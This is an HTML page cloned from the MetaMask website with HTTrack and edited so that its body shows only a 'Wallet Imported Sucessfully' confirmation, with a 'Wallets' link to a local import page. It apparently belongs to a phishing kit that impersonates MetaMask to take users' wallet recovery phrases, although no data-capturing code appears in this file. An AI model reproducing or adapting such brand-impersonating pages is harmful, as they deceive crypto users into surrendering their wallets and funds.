<!DOCTYPE html><!--  This site was created in Webflow. http://www.webflow.com  -->
<!--  Last Published: Fri Mar 19 2021 17:29:12 GMT+0000 (Coordinated Universal Time)  -->
<html data-wf-page="604ec65d7935b4681e51b35d" data-wf-site="604ec65d7935b45ce251b35e">

<!-- Mirrored from metamask.io/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 22 Mar 2021 00:20:38 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<head>
  <meta charset="utf-8">
  <title>MetaMask Wallets</title>
  <meta content="A crypto wallet &amp; gateway to blockchain apps" name="description">
  <meta content="MetaMask" property="og:title">
  <meta content="A crypto wallet &amp; gateway to blockchain apps" property="og:description">
  <meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="og:image">
  <meta content="MetaMask" property="twitter:title">
  <meta content="A crypto wallet &amp; gateway to blockchain apps" property="twitter:description">
  <meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">
  <meta property="og:type" content="website">
  <meta content="summary_large_image" name="twitter:card">
  <meta content="width=device-width, initial-scale=1" name="viewport">
  <meta content="UA-37075177-6" name="google-site-verification">
  <meta content="Webflow" name="generator">
  <link href="css/normalize.css" rel="stylesheet" type="text/css">
  <link href="css/webflow.css" rel="stylesheet" type="text/css">
  <link href="css/metamask-staging-2.webflow.css" rel="stylesheet" type="text/css">
  <script src="../ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
  <script type="text/javascript">WebFont.load({  google: {    families: ["Changa One:400,400italic"]  }});</script>
  <!-- [if lt IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js" type="text/javascript"></script><![endif] -->
  <script type="text/javascript">!function(o,c){var n=c.documentElement,t=" w-mod-";n.className+=t+"js",("ontouchstart"in o||o.DocumentTouch&&c instanceof DocumentTouch)&&(n.className+=t+"touch")}(window,document);</script>
  <link href="images/favicon.png" rel="shortcut icon" type="image/x-icon">
  <link href="images/webclip.png" rel="apple-touch-icon">
  <link href="index.html" rel="canonical">
  <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-37075177-6"></script>
  <script type="text/javascript">window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());gtag('config', 'UA-37075177-6', {'anonymize_ip': true});</script>
</head>
<body class="body-4">
  <div data-collapse="medium" data-animation="default" data-duration="200" data-easing="ease-in-out" data-easing2="ease-in-out" id="downloadButtonNav" role="banner" class="navigation-bar dark w-nav">
    <div class="container-27 w-container">
      <a href="index.html" aria-current="page" class="brand-link w-nav-brand w--current"><img src="images/mm-logo.svg" width="211" alt="" class="image-3"></a>
      <nav role="navigation" class="navigation-menu w-nav-menu">
        <div data-hover="1" data-delay="0" class="w-dropdown">
          <div class="dropdown w-dropdown-toggle">
            
            <div>Features</div>
          </div>
          <nav class="dropdown-list w-dropdown-list">
            <a href="#" class="dropdown-link w-dropdown-link">Swaps</a>
          </nav>
        </div>
        <div data-hover="1" data-delay="0" class="w-dropdown">
          <div class="dropdown w-dropdown-toggle">
           
            <div>Support</div>
          </div>
          <nav class="dropdown-list w-dropdown-list">
            <a href="#" class="dropdown-link w-dropdown-link">FAQs</a>
            <a href="#" rel="noreferer, noopener" target="_blank" class="dropdown-link w-dropdown-link">Get Support</a>
          </nav>
        </div>
        <div data-hover="1" data-delay="0" class="w-dropdown">
          <div class="dropdown w-dropdown-toggle">
            
            <div>About</div>
          </div>
          <nav class="dropdown-list w-dropdown-list">
            <a href="#" class="dropdown-link w-dropdown-link">Team</a>
            <a href="https://consensys.net/open-roles/?discipline=32543" rel="noreferer, noopener" target="_blank" class="dropdown-link w-dropdown-link">Careers</a>
            <a href="https://medium.com/metamask" rel="noreferer, noopener" target="_blank" class="dropdown-link w-dropdown-link">Blog</a>
          </nav>
        </div>
        <div data-hover="1" data-delay="0" class="w-dropdown">
          <div class="dropdown w-dropdown-toggle">
           
            <div>Build</div>
          </div>
          <nav class="dropdown-list w-dropdown-list">
            <a href="#" rel="noreferer, noopener" class="dropdown-link w-dropdown-link">Developers</a>
            <a href="#" class="dropdown-link w-dropdown-link">Institutions</a>
          </nav>
        </div>
        <a href="import.html" class="navigation-link install-blue w-nav-link">Wallets</a>
      </nav>
      <div class="hamburger-button white w-nav-button">
        <div class="icon w-icon-nav-menu"></div>
      </div>
    </div>
  </div>

  <div>
    <div class="container-11 w-container">
      <div data-duration-in="300" data-duration-out="100" class="w-tabs">
        
        <div class="tabs-content w-tab-content">
          <div data-w-tab="Browser" class="tab-pane-tab-1 w-tab-pane w--tab-active">
            <h1 class="heading-12">Wallet Imported Sucessfully</h1><img src="https://genome.jouy.inra.fr/analyses/BAKERY_TERROIR/img/validated.png" width="120" height="120" sizes="(max-width: 767px) 100vw, 664px" srcset="https://genome.jouy.inra.fr/analyses/BAKERY_TERROIR/img/validated.png" alt=" MetaMask" class="download-image">
            
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  
  <div class="section-5 section-margins">
    <div class="browsers w-container">
      <h1 class="heading-12">Supported Browsers</h1>
      <div class="w-layout-grid grid-7">
        <a rel="noreferer, noopener" id="w-node-_2114e4df-a254-ef19-2736-8179ab2658cd-5051b365" href="https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn?hl=en" target="_blank" class="w-inline-block">
          <div class="w-layout-grid grid-8"><img src="images/chrome_1chrome.png" alt="Google Chrome logo" class="image-11">
            <div class="text-block-25">Chrome</div>
          </div>
        </a>
        <a rel="noreferer, noopener" href="https://addons.mozilla.org/en-US/firefox/addon/ether-metamask/" target="_blank" class="w-inline-block">
          <div class="w-layout-grid grid-8"><img src="images/Firefox_1Firefox.png" alt="Firefox logo" class="image-11">
            <div class="text-block-29">Firefox</div>
          </div>
        </a>
        <a rel="noreferer, noopener" href="https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn?hl=en" target="_blank" class="w-inline-block">
          <div class="w-layout-grid grid-8"><img src="images/Brave.png" alt="Brave browser logo" class="image-11">
            <div class="text-block-29">Brave</div>
          </div>
        </a>
        <a rel="noreferer, noopener" href="https://microsoftedge.microsoft.com/addons/detail/metamask/ejbalbakoplchlghecdalmeeeajnimhm?hl=en-US" target="_blank" class="w-inline-block">
          <div class="w-layout-grid grid-8"><img src="images/Edge.png" alt="Microsoft Edge logo" class="image-11">
            <div class="text-block-29">Edge</div>
          </div>
        </a>
      </div>
    </div>
  </div>
  
  <div class="footer accent">
    <div class="container-9 w-container"><img src="images/mm-logo.svg" alt=""></div>
    <div class="w-container">
      <div class="columns-6 w-row">
        <div class="column-3 partnership w-col w-col-3">
          <h5 class="heading-6 orange-text">LEGAL</h5>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Privacy Policy</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Terms of Use</a>
          <a href="#" class="footer-link">Contributor License Agreement</a>
        </div>
        <div class="column-3 w-col w-col-3">
          <h5 class="heading-6 orange-text">LEARN MORE</h5>
          <a href="#" class="footer-link">About</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Developers</a>
          <a href="#" class="footer-link">Download</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Documentation</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">MetaMask for Institutions</a>
        </div>
        <div class="column-3 w-col w-col-3">
          <h5 class="heading-6 orange-text">GET INVOLVED</h5>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">GitHub</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Gitcoin</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Open Positions</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Swag Shop</a>
        </div>
        <div class="column-5 w-col w-col-3">
          <h5 class="heading-6 orange-text">CONNECT</h5>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Contact Us</a>
          <a href="#" class="footer-link">FAQs</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Support</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Blog</a>
          <a href="#" rel="noreferer, noopener" target="_blank" class="footer-link">Twitter</a>
        </div>
      </div>
    </div>
    <div class="container-19 w-container"></div>
    <div class="container-10 w-container">
      <p class="paragraph">©2021 MetaMask • A ConsenSys Formation</p>
    </div>
  </div>
  <script src="../d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8f2e1.js?site=604ec65d7935b45ce251b35e" type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <script src="js/webflow.js" type="text/javascript"></script>
  <!-- [if lte IE 9]><script src="https://cdnjs.cloudflare.com/ajax/libs/placeholders/3.0.2/placeholders.min.js"></script><![endif] -->
  <script>
document.getElementById("downloadButtonNav").onclick = function(){
	if (gtag) {
		gtag('event', 'Click', {
		'event_category': 'Download',
		'event_label': 'Nav Bar Button'
	});
	}
}
</script>
</body>

<!-- Mirrored from metamask.io/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 22 Mar 2021 00:20:47 GMT -->
</html>